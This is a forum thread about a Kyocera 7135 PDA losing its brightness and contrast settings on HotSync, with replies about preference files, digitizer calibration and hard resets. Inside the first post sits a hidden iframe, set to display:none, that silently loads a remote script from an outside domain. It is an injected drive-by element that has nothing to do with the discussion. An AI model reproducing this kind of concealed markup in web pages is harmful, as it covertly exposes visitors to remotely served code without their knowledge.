+ Reply to Thread

Brightness/Contrast Change each HotSync

Has anyone else noticed that each time you hotsync it resets the display? I've got it exactly how I like it and then have to play with the two setting to get the right balance. <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

sorry .. I just hotsynched mine and it left the dimmer at the lowest like I like it and the contrast is the same as well ... a little to the right.

My contrast and brightness setting do not reset with the hotsync. I wonder if there is something in the saved_preferences.prc file on your desktop that is overwriting the 7135 display settings each time you hotsync?

i think i was just reckless with my graffiti area. must be an ID 10 T error

Am I alone on this one?...

A couple weeks ago, I lost functionality in the little shortcuts to brightness and contast in the graffiti area. I'm just about positive that a hard reset will bring it back, but I haven't felt like doing a hard reset yet. In the meantime, I can still adjust brightness and contrast by going through PDA Prefs, but the shortcut is much more convenient.
    ~'kito
    pdaPhoneHome Moderator

Originally posted by Markito
    Am I alone on this one?...

A couple weeks ago, I lost functionality in the little shortcuts to brightness and contast in the graffiti area. I'm just about positive that a hard reset will bring it back, but I haven't felt like doing a hard reset yet. In the meantime, I can still adjust brightness and contrast by going through PDA Prefs, but the shortcut is much more convenient.
    True calibrating the digitizer again? It's tied to that.

SynC,
    I was so excited about your answer... but then it didn't help.
    I digitized (which I haven't done for a long time), but then when I hit the shortcuts, I get either a beep (but nothing else) or a dot in the lower righthand corner, but now brightness or contrast shortcuts.

Oh well, I'll have to hard reset soon I guess. Thanks anyway.
    ~'kito
    pdaPhoneHome Moderator

Sometimes it is the obvious stuff for the very hi-tech folks... so I gotta ask.

Did you turn off off all hacks and reset? You know -- the ones that are invoked with keystrokes?
    iPhone 4S BB8830/Treo700wx/Treo700w/ XV6600/Treo600/Kyo7135

Thanks B., I appreciate the compliment. I did not turn off all hacks... I think I would feel naked! I will give it a try.
    Thanks,
    ~'kito
    pdaPhoneHome Moderator